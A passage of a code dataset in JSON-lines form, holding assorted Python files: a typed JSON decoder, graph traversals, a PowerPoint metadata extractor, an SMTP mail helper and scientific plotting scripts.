return_val = set(from_json_obj(x, t.__args__[0]) for x in obj)\n assert is_instance(return_val, t)\n return return_val\n if t.__origin__ is frozenset:\n if not isinstance(obj, list):\n raise TypeError(\"Object %s is not list (t=%s).\"%(str(obj), str(t)))\n return_val = frozenset(from_json_obj(x, t.__args__[0]) for x in obj)\n assert is_instance(return_val, t)\n return return_val\n if t.__origin__ is tuple:\n if not isinstance(obj, list):\n raise TypeError(\"Object %s is not list (t=%s).\"%(str(obj), str(t)))\n if len(t.__args__) == 2 and t.__args__[1] is ...: # pylint:disable=no-else-return\n return_val = tuple(from_json_obj(x, t.__args__[0]) for x in obj)\n assert is_instance(return_val, t)\n return return_val\n else:\n if len(obj) != len(t.__args__):\n raise TypeError(\"List %s is of incorrect length (t=%s).\"%(str(obj), str(t)))\n return_val = tuple(from_json_obj(x, t.__args__[i]) for i, x in enumerate(obj))\n assert is_instance(return_val, t)\n return return_val\n if t.__origin__ in (dict, Mapping):\n if not isinstance(obj, (dict, OrderedDict)):\n raise TypeError(\"Object %s is not dict or OrderedDict (t=%s).\"%(str(obj), str(t)))\n converted_dict = dict() # type:ignore\n for field in obj:\n if not isinstance(field, str):\n raise TypeError(\"Object key %s is string (t=%s).\"%(field, str(t)))\n converted_dict[field] = from_json_obj(obj[field], t.__args__[1])\n assert is_instance(converted_dict, t)\n return converted_dict\n if t.__origin__ is OrderedDict:\n if not isinstance(obj, OrderedDict):\n raise TypeError(\"Object %s is not dict or OrderedDict (t=%s).\"%(str(obj), str(t)))\n converted_dict = OrderedDict() # type:ignore\n for field in obj:\n if not isinstance(field, str):\n raise TypeError(\"Object key %s is string (t=%s).\"%(field, str(t)))\n converted_dict[field] = from_json_obj(obj[field], t.__args__[1])\n assert is_instance(converted_dict, t)\n return converted_dict\n raise AssertionError(_UNREACHABLE_ERROR_MSG) # pragma: no cover\n","sub_path":"typing_json/decoding.py","file_name":"decoding.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"560970325","text":"class Solution:\r\n def myPow(self, x: float, n: int):\r\n ans, base, positive = 1, x, True if n > 0 else False\r\n n = abs(n)\r\n while n > 0:\r\n if n%2 == 1:\r\n ans *= base\r\n base *= base\r\n n = n//2\r\n return ans if positive else 
1/ans","sub_path":"50_pow(x,n).py","file_name":"50_pow(x,n).py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"643409268","text":"#!/usr/bin/env python\n#\n# Copyright 2015-present Facebook. All Rights Reserved.\n#\n# This program file is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation; version 2 of the License.\n#\n# This program is distributed in the hope that it will be useful, but WITHOUT\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n# for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program in a file named COPYING; if not, write to the\n# Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor,\n# Boston, MA 02110-1301 USA\n#\nfrom typing import Any, Dict, Optional\n\nfrom node import node\nfrom rest_pal_legacy import *\n\n\nclass spbNode(node):\n def __init__(self, info=None, actions=None):\n if info == None:\n self.info = {}\n else:\n self.info = info\n\n if actions == None:\n self.actions = []\n else:\n self.actions = actions\n\n async def doAction(self, data, param: Optional[Dict[Any, Any]] = None):\n if pal_sled_action(data[\"action\"]) == -1:\n res = \"failure\"\n else:\n res = \"success\"\n\n result = {\"result\": res}\n\n return result\n\n\ndef get_node_spb():\n name = pal_get_platform_name()\n info = {\"Description\": name + \" Side Plane\"}\n actions = [\"sled-cycle\", \"sled-identify-on\", \"sled-identify-off\"]\n return spbNode(info, actions)\n","sub_path":"common/recipes-rest/rest-api/files/node_spb.py","file_name":"node_spb.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"173286281","text":"import turtle\r\nimport math\r\n\r\ndef crcl(R, k):\r\n for i in range(360):\r\n turtle.forward(math.pi * (R/180))\r\n if k == 0:\r\n turtle.left(1)\r\n else:\r\n turtle.right(1)\r\n\r\nturtle.shape('turtle')\r\nturtle.speed(0)\r\nturtle.left(90)\r\nfor R in range(50, 100, 10):\r\n crcl(R, 0)\r\n crcl(R, 1)\r\nturtle.exitonclick()\r\n","sub_path":"turtle1/n11.py","file_name":"n11.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"411851537","text":"from totalimpactwebapp import db\nfrom totalimpactwebapp import util\nimport datetime\nimport jinja2\n\n\n\nclass Card(object):\n\n def __init__(self, **kwargs):\n if not \"timestamp\" in kwargs:\n self.timestamp = kwargs[\"timestamp\"]\n else:\n self.timestamp = datetime.datetime.utcnow()\n\n\n @classmethod\n def would_generate_a_card(self):\n raise NotImplementedError\n\n def get_template_name(self):\n raise NotImplementedError\n\n @property\n def card_type(self):\n return type(self).__name__\n\n\n @property\n def sort_by(self):\n score = 0\n\n if self.milestone_awarded == 1:\n score += 500 # as good as a 75th percentile\n\n if self.milestone_awarded > 1:\n score += (self.milestone_awarded + 500)\n\n if \"youtube\"==self.provider:\n score += 1000\n elif \"wikipedia\"==self.provider:\n score += 10000\n\n return score\n\n\n def to_html(self):\n templateLoader = jinja2.FileSystemLoader(searchpath=\"totalimpactwebapp/templates\")\n templateEnv = 
jinja2.Environment(loader=templateLoader)\n html_template = templateEnv.get_template(self.get_template_name() + \".html\")\n return html_template.render({\"card\": self})\n\n def to_text(self):\n templateLoader = jinja2.FileSystemLoader(searchpath=\"totalimpactwebapp/templates\")\n templateEnv = jinja2.Environment(loader=templateLoader)\n html_template = templateEnv.get_template(self.get_template_name() + \".txt\")\n return html_template.render(self)\n\n def to_dict(self):\n # ignore some properties to keep dict small. \n properties_to_ignore = [\"profile\", \"product\"]\n ret = util.dict_from_dir(self, properties_to_ignore)\n\n # individual cards can add in more subelements to help with debugging\n ret[\"url_slug\"] = self.profile.url_slug\n\n return ret\n\n\n\nclass ProductNewMetricCard(Card):\n\n def __init__(self, profile, product, metric, timestamp=None):\n self.product = product\n self.profile = profile\n self.metric = metric\n super(ProductNewMetricCard, self).__init__(timestamp=timestamp)\n\n @classmethod\n def would_generate_a_card(cls, metric):\n # a milestone can be awarded if the previous value was 0, \n # which would mean there is no diff_value\n return metric.diff_value > 0\n\n @property\n def num_profile_products_this_good(self):\n ret = 0\n for product in self.profile.products_not_removed:\n\n if product.has_metric_this_good(\n self.metric.provider,\n self.metric.interaction,\n self.metric.display_count):\n ret += 1\n return ret\n\n @property\n def num_profile_products_this_good_ordinal(self):\n return util.ordinal(self.num_profile_products_this_good)\n\n @property\n def milestone_awarded(self):\n return self.metric.milestone_just_reached\n\n @property\n def provider(self):\n return self.metric.provider\n\n @property\n def sort_by(self):\n score = super(ProductNewMetricCard, self).sort_by\n\n if self.metric.percentile and self.metric.percentile[\"value\"] > 50:\n top_half = self.metric.percentile[\"value\"] - 50\n score += (top_half * 10) # max 500\n\n try:\n if \"plos\"==self.metric.provider or \"slideshare\"==self.metric.provider:\n score += int(self.metric.diff_value)\n elif \"scopus\"==self.metric.provider:\n score += (int(self.metric.diff_value) * 100)\n else:\n score += (int(self.metric.diff_value) * 10)\n except TypeError:\n # no diff value because is first metric card\n pass\n\n return score\n\n\n def get_template_name(self):\n return \"card-product\"\n\n def to_dict(self):\n mydict = super(ProductNewMetricCard, self).to_dict()\n mydict.update({\n \"tiid\": self.product.tiid,\n })\n return mydict\n\n\n\n\n\n\n\nclass ProfileNewMetricCard(Card):\n\n def __init__(self, profile, provider, interaction, timestamp=None):\n self.profile = profile\n self.provider = provider\n self.interaction = interaction\n\n # this card doesn't have a solo metric object, but it helps to \n # save an exemplar metric so that it can be used to access relevant display properies\n self.exemplar_metric = profile.get_metrics_by_name(provider, interaction)[0] #exemplar metric \n super(ProfileNewMetricCard, self).__init__(timestamp=timestamp)\n\n\n @classmethod\n def would_generate_a_card(cls, profile, provider, interaction):\n return profile.metric_milestone_just_reached(provider, interaction) is not None\n\n @property\n def milestone_awarded(self):\n try:\n return self.profile.metric_milestone_just_reached(self.provider, self.interaction)[\"milestone\"]\n except KeyError:\n return None\n\n @property\n def current_value(self):\n try:\n return 
self.profile.metric_milestone_just_reached(self.provider, self.interaction)[\"accumulated_diff_end_value\"]\n except KeyError:\n return None\n\n @property\n def diff_value(self):\n try:\n return self.profile.metric_milestone_just_reached(self.provider, self.interaction)[\"accumulated_diff\"]\n except KeyError:\n return None \n\n @property\n def sort_by(self):\n score = super(ProfileNewMetricCard, self).sort_by\n return score + 1000\n\n def get_template_name(self):\n return \"card-profile\"\n\n\n def to_dict(self):\n # ignore some properties to keep dict small. \n properties_to_ignore = [\"profile\", \"exemplar_metric\"]\n ret = util.dict_from_dir(self, properties_to_ignore)\n\n # add to help with debugging\n ret[\"url_slug\"] = self.profile.url_slug\n\n return ret\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"totalimpactwebapp/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"180167856","text":"import matplotlib.pyplot as plt\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets('MNIST_data', one_hot = True)\nbatch_xs, batch_ys = mnist.train.next_batch(100) \n\nrows = 3\ncols = 5\ncount = rows*cols\nfig, ax = plt.subplots(nrows=rows, ncols=cols, sharex=True, sharey=True,)\nax = ax.flatten()\n\nfor i in range(count):\n img = batch_xs[i].reshape(28, 28)\n ax[i].imshow(img, interpolation='nearest')\n #ax[i].imshow(img, cmap='Greys', interpolation='nearest')\n\nax[0].set_xticks([])\nax[0].set_yticks([])\nplt.tight_layout()\n\n# plt.savefig('mnist_figures.png', dpi=300)\nplt.show()\n\n","sub_path":"ch06_CNN/ch0602_ans/show-grid-images.py","file_name":"show-grid-images.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283956528","text":"\"\"\"\nSimple graph implementation\n\"\"\"\n\n\nclass Queue:\n def __init__(self):\n self.queue = []\n def enqueue(self, value):\n self.queue.append(value)\n def dequeue(self):\n if self.size() > 0:\n return self.queue.pop(0)\n else:\n return None\n def size(self):\n return len(self.queue)\n\nclass Stack:\n def __init__(self):\n self.stack = []\n def push(self, value):\n self.stack.append(value)\n def pop(self):\n if self.size() > 0:\n return self.stack.pop()\n else:\n return None\n def size(self):\n return len(self.stack)\n\n\nclass Graph:\n \"\"\"Represent a graph as a dictionary of vertices mapping labels to edges.\"\"\"\n def __init__(self):\n self.vertices = {} # initialize an empty dictionary of vertices\n def add_vertex(self, vertex_id):\n self.vertices[vertex_id] = Vertex(vertex_id) # key to be vertex_id and value to be Vertex\n def add_edge(self, v1, v2): # undirected graph\n if v1 in self.vertices and v2 in self.vertices: # if v1 and v2 both exist in the vertex list \n self.vertices[v1].edges.add(v2)\n self.vertices[v2].edges.add(v1)\n else:\n raise IndexError('Vertex not found')\n def add_directed_edge(self, v1, v2):\n if v1 in self.vertices and v2 in self.vertices:\n self.vertices[v1].edges.add(v2)\n else:\n raise IndexError('Vertex not found')\n\n def bft(self, starting_node):\n # create an empty Queue\n q = Queue()\n # create an empty visited list\n visited = set()\n # add the start node to the queue\n q.enqueue(starting_node)\n # while the Queue is not empty...\n while q.size() > 0:\n # remove the first node from the Queue\n node = q.dequeue()\n # check if node is visited\n if node not in 
visited:\n # if not, mark node as visited\n print(node)\n visited.add(node)\n # print(self.vertices[node].edges)\n # then put all its children in the queue\n for child in self.vertices[node].edges:\n # if child not in visited:\n q.enqueue(child)\n\n def dft(self, starting_node):\n # create an empty Stack\n s = Stack()\n # create an empty visited list\n visited = set()\n # add the start node to the stack\n s.push(starting_node)\n # while the Stack is not empty...\n while s.size() > 0:\n # remove the first node from the Stack\n node = s.pop()\n # if it hasn't been visited\n if node not in visited:\n # mark it as visited\n print(node)\n visited.add(node)\n # then put all its children in the Stack\n for child in self.vertices[node].edges:\n s.push(child)\n \n # mark the starting node as visited,\n # then for each unvisited child,\n # call dft_r on that child\n def dft_r(self, starting_node, visited = None):\n if visited is None:\n visited = set()\n # mark starting_node as visited\n print(starting_node)\n visited.add(starting_node)\n for child in self.vertices[starting_node].edges:\n # for each unvisited child...\n if child not in visited:\n # ...call dft_r on that child\n self.dft_r(child, visited)\n\n def bfs(self, starting_node, destination_node):\n # create an empty Queue\n q = Queue()\n # create an empty visited list\n visited = set()\n # add the initial path to the queue\n q.enqueue([starting_node])\n # while the Queue is not empty...\n while q.size() > 0:\n # remove the first path from the Queue\n path = q.dequeue()\n # if last node in the path has not been visited\n if path[-1] not in visited:\n # mark it as visited\n if destination_node == path[-1]:\n return path\n visited.add(path[-1])\n # then put the path to all its children in the queue\n for child in self.vertices[path[-1]].edges:\n new_path = list(path) # copying the list otherwise we're going to be using the same instance of list and adding multiple times to it, which will not work\n new_path.append(child)\n q.enqueue(new_path)\n return None\n\n def dfs(self, starting_node, destination_node):\n # create an empty Stack\n s = Stack()\n # create an empty visited list\n visited = set()\n # add the initial path to the stack\n s.push([starting_node])\n # while the Stack is not empty...\n while s.size() > 0:\n # remove the first path from the Stack\n path = s.pop()\n # if last node in the path has not been visited\n if path[-1] not in visited:\n # mark it as visited\n if destination_node == path[-1]:\n return path\n visited.add(path[-1])\n # then put the path to all its children in the stack\n for child in self.vertices[path[-1]].edges:\n new_path = list(path)\n new_path.append(child)\n s.push(new_path)\n return None\n\n\nclass Vertex:\n def __init__(self, vertex_id):\n self.id = vertex_id\n self.edges = set()\n\n\n\n# Graphs I day 1 - https://www.youtube.com/watch?v=qWQORVXLXgE\n# Graphs I day 2 - https://www.youtube.com/watch?v=erlKh2fGPYI\n# Graphs II day 1 - https://www.youtube.com/watch?v=yj2dOI67ewk\n# Graphs II day 2 - https://youtu.be/OiI5HUHWbQU","sub_path":"projects/graph/src/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"193798422","text":"class Request(object):\n def __init__(self, timestamp, user=None, category=None, service=None, complain=None):\n self.timestamp = timestamp\n self.user = user\n self.category = category\n self.service = service\n self.complain = complain\n\n @staticmethod\n 
def get_request_json(obj):\n \"\"\"\n Create a pickled json object\n :param obj: Request object to be pickled.\n :return: Encoded pickled string. \n \"\"\"\n if isinstance(obj, Request):\n import jsonpickle\n return jsonpickle.encode(obj, unpicklable=True)\n raise TypeError\n\n\nif __name__ == '__main__':\n\n from api.json.json_model import Auth, Category, Service, Complain\n authObj = Auth(auth_code = 'ccf6cebd53549f1d74a82bb455d907648fa28d0c',\n phone_number = 9780044091,\n serial_number = 'JLIU897978F',\n name = None,\n email = None)\n categoryObj = Category(category_id = 5467)\n serviceObj = Service(service_id=1234)\n complainObj = Complain(address = 'A-98',\n message = 'Repair my arse',\n service_status = '0',\n timestamp = '98276998983',\n complain_phone_number = None)\n import datetime\n timestamp = datetime.datetime.now().strftime(\"%d-%m-%Y_%H_%M_%S_%f\")\n RequestObj = Request(timestamp=timestamp, auth=authObj, category=categoryObj, service=serviceObj, complain=complainObj)\n print(Request.get_request_json(RequestObj))","sub_path":"api/json/json_request.py","file_name":"json_request.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538468303","text":"#!/usr/bin/env python\n\n# Copyright (C) 2013-2015 A. Eijkhoudt and others\n\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# TABLE: title:LONGTEXT, created_by:LONGTEXT, modified_by:LONGTEXT, revision:INT, creation_date:LONGTEXT, modify_date:LONGTEXT, total_length: FLOAT, total_words:INT, application:LONGTEXT, pp_format:LONGTEXT, paragraphs:INT, slides:INT, notes:INT, hidden_slides:INT, videos:INT, company:LONGTEXT, shared:LONGTEXT, version:FLOAT, content:LONGTEXT\n\nimport xml.etree.ElementTree as ET\nimport re\nimport zipfile\nimport sys\nimport pptx\n\n\ndef process(file, config, rcontext, columns=None):\n fullpath = file.fullpath\n try:\n document = zipfile.ZipFile(fullpath)\n except:\n return None\n\n # document core, ie. keywords/title/subject and mod+creation dates\n try:\n xmlprop = document.read(\"docProps/core.xml\")\n except:\n # Not a valid pptx file\n return None\n\n # data regarding ammount of pages/words. 
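# Aside, assuming the standard OPC/Dublin Core namespace URIs: looking the
# core.xml fields up by qualified tag is sturdier than the positional
# tree[i] indexing used below, because it survives element reordering.
import zipfile
import xml.etree.ElementTree as ET

_NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}

def read_core_props(path):
    with zipfile.ZipFile(path) as z:
        root = ET.fromstring(z.read("docProps/core.xml"))
    def get(tag):
        return root.findtext(tag, default=None, namespaces=_NS)
    return {"title": get("dc:title"), "creator": get("dc:creator"),
            "last_modified_by": get("cp:lastModifiedBy"),
            "created": get("dcterms:created"), "modified": get("dcterms:modified")}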
Also contains app version and OS.\n xmlapp = document.read(\"docProps/app.xml\")\n\n # Minidom alternative\n tree = ET.fromstring(xmlprop)\n tree_app = ET.fromstring(xmlapp)\n\n #### Just some data, might be usefull lat0r ####\n data_tree = []\n data_app = []\n\n# \tfor basic in range(6):\n# \t\tdata_tree.append(tree[basic].text)\n\n# \tfor app in range(17):\n# \t\tdata_app.append(tree_app[app].text)\n\n\n data_tree.append(tree[0].text)\n data_tree.append(tree[1].text)\n data_tree.append(tree[2].text)\n data_tree.append(tree[3].text)\n data_tree.append(tree[4].text)\n data_tree.append(tree[5].text)\n\n data_app.append(tree_app[0].text)\n data_app.append(tree_app[1].text)\n data_app.append(tree_app[2].text)\n data_app.append(tree_app[3].text)\n data_app.append(tree_app[4].text)\n data_app.append(tree_app[5].text)\n data_app.append(tree_app[6].text)\n data_app.append(tree_app[7].text)\n data_app.append(tree_app[8].text)\n data_app.append(tree_app[12].text)\n data_app.append(tree_app[14].text)\n data_app.append(tree_app[15].text)\n\n\n textlist = []\n powerpoints = pptx.Presentation(fullpath)\n slidenum = 1\n for slide in powerpoints.slides:\n for shape in slide.shapes:\n if not shape.has_textframe:\n continue\n for paragraph in shape.textframe.paragraphs:\n for run in paragraph.runs:\n if not any(d.get('Slide', None) == slidenum for d in textlist):\n textlist.append({\"Slide\": slidenum, \"Content\": [run.text]})\n else:\n for val in textlist:\n if val[\"Slide\"] == slidenum:\n val[\"Content\"].append(run.text)\n slidenum += 1\n\n merged = data_tree + data_app + textlist\n return merged\n\n\n# \ttitle = tree[0].text\n# \tcreated = tree[1].text\n# \tlastmod = tree[2].text\n# \trevision = tree[3].text\n# \tmadeon = tree[4].text\n# \tchangedon = tree[5].text\n\n# \ttime = tree_app[0].text\n# \twords = tree_app[1].text\n# \tapplication = tree_app[2].text\n# \tppFormat = tree_app[3].text\n# \tparagraphs = tree_app[4].text\n# \tslides = tree_app[5].text\n# \tnotes = tree_app[6].text\n# \thiddenslides = tree_app[7].text\n# \tmultimediaclips = tree_app[8].text\n# \tcompany = tree_app[12].text\n# \tshared = tree_app[14].text\n# \tversion = tree_app[16].text\n","sub_path":"source/modules/application/vnd.ms-powerpoint/pptx.py","file_name":"pptx.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"206796185","text":"# -*- coding: utf-8 -*-\nimport sys\nimport json\nimport mail_conf as settings\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.utils import formatdate\nfrom email.utils import formataddr\nfrom email.header import Header\n\ndef send_mail(title, text):\n # メールを送る\n to = settings.MAIL_TO\n subject = title\n send_via_gmail(to, subject, text)\n\ndef send_via_gmail(to, subject, text):\n # smtpにてメール送信\n from_addr = settings.MAIL_FROM\n message = create_message(to, from_addr, subject, text)\n smtp = smtplib.SMTP(settings.MAIL_HOST, settings.MAIL_PORT)\n smtp.ehlo()\n smtp.starttls()\n smtp.ehlo()\n smtp.login(from_addr, settings.MAIL_PASS)\n smtp.sendmail(from_addr, [to], message.as_string())\n smtp.close()\n\ndef create_message(to, from_addr, subject, body):\n # メッセージをエンコードして返す\n encoding = 'utf-8'\n sender_name = Header(from_addr, encoding).encode()\n recipient_name = Header(from_addr, encoding).encode()\n message = MIMEText(body.encode(encoding), 'plain', _charset=encoding)\n message['Subject'] = Header(subject, encoding )\n message['From'] = formataddr((sender_name, from_addr))\n 
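# Sketch of the header-encoding idea at work here, assuming only the stdlib
# email package: formataddr() pairs an RFC 2047-encoded display name with a
# bare ASCII address, which is why only the name goes through Header().
from email.header import Header
from email.utils import formataddr

def encoded_addr(display_name, addr, charset="utf-8"):
    return formataddr((Header(display_name, charset).encode(), addr))
# e.g. encoded_addr(u"差出人", "sender@example.com")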
message['To'] = formataddr((recipient_name, to))\n message['Date'] = formatdate()\n return message\n\nif __name__ == '__main__':\n args = sys.argv\n send_mail(args[1], args[2])\n\n","sub_path":"api/mail/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"252528332","text":"\"\"\"To plot door open percentage comparison\n\n \"\"\"\n# pylint: disable=no-member\nfrom datetime import time, timedelta, datetime\nimport matplotlib.ticker as mtick\nimport matplotlib.pyplot as plt\nimport itertools\nimport seaborn as sns\nimport pandas as pd\nfrom classes.weather import Weather\nfrom savepdf_tex import savepdf_tex\nimport pickle\nimport os\nimport numpy as np\nnp.set_printoptions(precision=3)\nimport util.util_funcs as uf\n\n\n\nif __name__ == '__main__':\n\n opening_method=['internal_doors_only_random']\n method=['DTMC']\n movement_method = ['change_rooms_in_group', None]\n contam_model_names = ['school_corridor']\n plot_time_series = False\n save=True\n wind_dir = [0.0, 90.0]\n wind_speeds = [5.0,15.0]\n door_opening_fraction = np.round(np.linspace(0.0, 1.0, 21), decimals=2)\n amb_temps = [5.0]\n corridor_temp = [19.0]\n classroom_temp = [21.0]\n window_height = [1.0]\n time_to_get_results = timedelta(days=4, hours=23, minutes=50)\n time_steps = [timedelta(minutes=10)]\n\n\n dtype_converters = {\n 'duration': lambda x: timedelta(days=datetime.strptime(x,\"%d days\").day),\n 'school_start': lambda x: datetime.strptime(x, '%H:%M:%S').time(),\n 'school_end': lambda x: datetime.strptime(x, '%H:%M:%S').time(),\n 'time_step': lambda x: timedelta(minutes=datetime.strptime(x,\"0 days %H:%M:%S\").minute),\n }\n\n model_log = pd.read_csv(f'{os.path.dirname(os.path.realpath(__file__))}/results/model_log.csv',\n index_col=0, converters=dtype_converters)\n runs_to_plot = ['movement_001_q5']#, 'movement_002_q10', 'movement_003_q25']\n models_to_plot = model_log[(model_log['run name'].isin(runs_to_plot))]\n\n fig, ax = plt.subplots(1, 1, figsize=(8, 8))\n # fig2, ax2 = plt.subplots(1, 1, figsize=(12, 6))\n col_names = pd.MultiIndex.from_product([models_to_plot['quanta_gen_rate'].unique(),\n models_to_plot['wind_speed'].unique(),\n models_to_plot['ambient_temp'].unique(),\n models_to_plot['movement_method'].unique()],\n names=['quanta', 'wind speed', 'ambient temp.', 'movement_method'])\n df_plotting = pd.DataFrame(columns=col_names)\n print(f'Number of models to plot: {len(models_to_plot)}')\n for i, file in enumerate(models_to_plot.index):\n print(f'extracting data from model {i} of {len(models_to_plot)}', end='\\r')\n model = uf.load_model(\n file, loc=f'{os.path.dirname(os.path.realpath(__file__))}/results')\n \n speed = model.weather.wind_speed\n temp = model.weather.ambient_temp\n quanta = model.consts['quanta_gen_rate']\n movement_meth = model.movement_method\n df_plotting[(quanta, speed, temp, movement_meth)] = model.get_risk_at_time(time_to_get_results)\n\n df_plotting = df_plotting.melt(value_name='risk')\n df_plotting['movement_method'].fillna(value='No movement', inplace=True)\n flds = ['ambient temp.', 'wind speed']\n df_plotting[', '.join(flds)] = pd.Series(df_plotting.reindex(flds, axis='columns')\n .astype('str')\n .values.tolist()\n ).str.join(', ')\n sns.boxplot(x=', '.join(flds), y='risk', hue='movement_method', data=df_plotting)#, fliersize=0)\n ax.yaxis.set_major_formatter(mtick.PercentFormatter(xmax=1, decimals=None, symbol=r'\\%', is_latex=True))\n 
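# Toy version of the wide -> long reshape used above, assuming pandas: the
# parameter grid becomes a column MultiIndex, and melt() turns each index
# level into its own column so seaborn can hue/facet on it. Values invented.
import pandas as pd

cols = pd.MultiIndex.from_product([[5, 10], [5.0, 15.0]],
                                  names=["quanta", "wind speed"])
wide = pd.DataFrame([[0.1, 0.2, 0.3, 0.4]], columns=cols)
long_form = wide.melt(value_name="risk")   # columns: quanta, wind speed, risk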
ax.set_xlabel('(ambient temp., wind speed)')\n ax.set_ylabel('Infection Risk')\n if save:\n save_loc = '/home/tdh17/Documents/BOX/NCS Project/models/stochastic_model/figures/'\n savepdf_tex(fig=fig, fig_loc=save_loc,\n name='people_movement')\n else:\n plt.show()\n plt.close()\n # mean_df = df_plotting.mean().reset_index(level=[0,2,3,4,5])\n # for i, (wind_d, temp, speed, quanta) in enumerate(itertools.product(mean_df['wind_direction'].unique(),\n # mean_df['ambient temp.'].unique(),\n # mean_df['wind speed'].unique(),\n # mean_df['quanta'].unique())):\n # wind_label = 'low' if speed == 5.0 else 'high'\n # temp_label = 'Winter' if temp == 5.0 else f'Autumn'\n # quanta_color= {5:'blue', 10:'red',25:'green'}\n # wind_ls = {5.0: '-', 15.0: '--'}\n # wind_dir_marker = {0.0: '*', 90.0: 'D'}\n # df = mean_df[(mean_df['wind speed'] == speed) & (mean_df['ambient temp.'] == temp) & (mean_df['quanta'] == quanta) & (mean_df['wind_direction'] == wind_d)].dropna()\n # baseline = df.loc[1.0,:]\n # ax1.plot(df[df['group'] == 'total'].index,\n # df[df['group'] == 'total'][0]/baseline[baseline['group']== 'total'][0].values[0] - 1,\n # color=quanta_color[quanta], ls=wind_ls[speed], marker=wind_dir_marker[wind_d],\n # label=f'{temp_label} - {wind_label} wind speed, quanta = {quanta}, wind_direction = {wind_d}')\n # ax2.plot(df[df['group'] == 'total'].index,\n # df[df['group'] == 'first room'][0],#/baseline[baseline['group']== 'first room'][0].values[0],\n # color=f'C{i}', label=f'{temp_label} - {wind_label} wind speed, quanta = {quanta}, wind_direction = {wind_d}')\n # # ax1.axhline(1, color='k', ls='--')\n # # # ax1.plot(box_plot_df.xs(key='total', level=1, axis=1).columns,\n # # # box_plot_df.xs(key='total', level=1, axis=1).quantile(q=0.95, axis=0), color=f'C{i}', ls='--')\n # # ax2.plot(box_plot_df.xs(key='first room', level=1, axis=1).columns,\n # # box_plot_df.xs(key='first room', level=1, axis=1).quantile(q=0.95, axis=0), color=f'C{i}', ls='--')\n # # ax1.boxplot(x=box_plot_df.xs(key='total', level=1, axis=1),\n # # positions=door_opening_fraction,\n # # manage_ticks=False, widths=0.03, whis=[0,100],\n # # boxprops=dict(color=f'C{i}',), whiskerprops=dict(color=f'C{i}',),\n # # capprops=dict(color=f'C{i}'), flierprops=dict(marker='x'),\n # # )\n # # ax2.boxplot(x=box_plot_df.xs(key='first room', level=1, axis=1),\n # # positions=door_opening_fraction,\n # # manage_ticks=False, widths=0.03, whis=[0,100],\n # # boxprops=dict(color=f'C{i}',), whiskerprops=dict(color=f'C{i}',),\n # # capprops=dict(color=f'C{i}'), flierprops=dict(marker='x'),\n # # )\n # # box_plot_df.boxplot()\n # # breakpoint()\n # # sns.boxplot(x=\"door open\", y=\"value\", hue='grouping', data=box_plot_df.melt(), ax=ax1)\n\n # for ax in [ax1, ax2]:\n # ax.legend(frameon=False)\n # ax.set_xlabel(r'Door open percentage')\n # ax.set_xlim([0,1])\n # # ax.set_ylim(bottom=0)\n # # ax.set_ylabel(r'Infection risk', labelpad=15)\n # ax.set_ylabel(r'\\$RR = IR/IR_{\\Gamma = 1} - 1\\$', labelpad=15)\n # ax.yaxis.set_major_formatter(mtick.PercentFormatter(xmax=1, decimals=None, symbol=r'\\%', is_latex=True))\n # ax.xaxis.set_major_formatter(mtick.PercentFormatter(xmax=1, decimals=None, symbol=r'\\%', is_latex=True))\n # ax.spines['bottom'].set_position(('data', 0))\n \n\n \n # for ax, axis in itertools.product([ax1,ax2],['bottom','left']):\n # ax.spines[axis].set_linewidth(2)\n # # ax.spines[axis].set_color('black')\n # for ax, axis in itertools.product([ax1,ax2],['top','right']):\n # ax.spines[axis].set_visible(False)\n \n\n\n\n # # 
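# The commented block below computes a baseline-relative metric,
# RR = IR / IR_baseline - 1. A tiny pandas illustration with invented
# numbers, taking the fully-open (1.0) case as the baseline:
import pandas as pd

ir = pd.Series({0.0: 0.30, 0.5: 0.22, 1.0: 0.18})   # infection risk by fraction
rr = ir / ir.loc[1.0] - 1                            # 0 at baseline, >0 is worse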
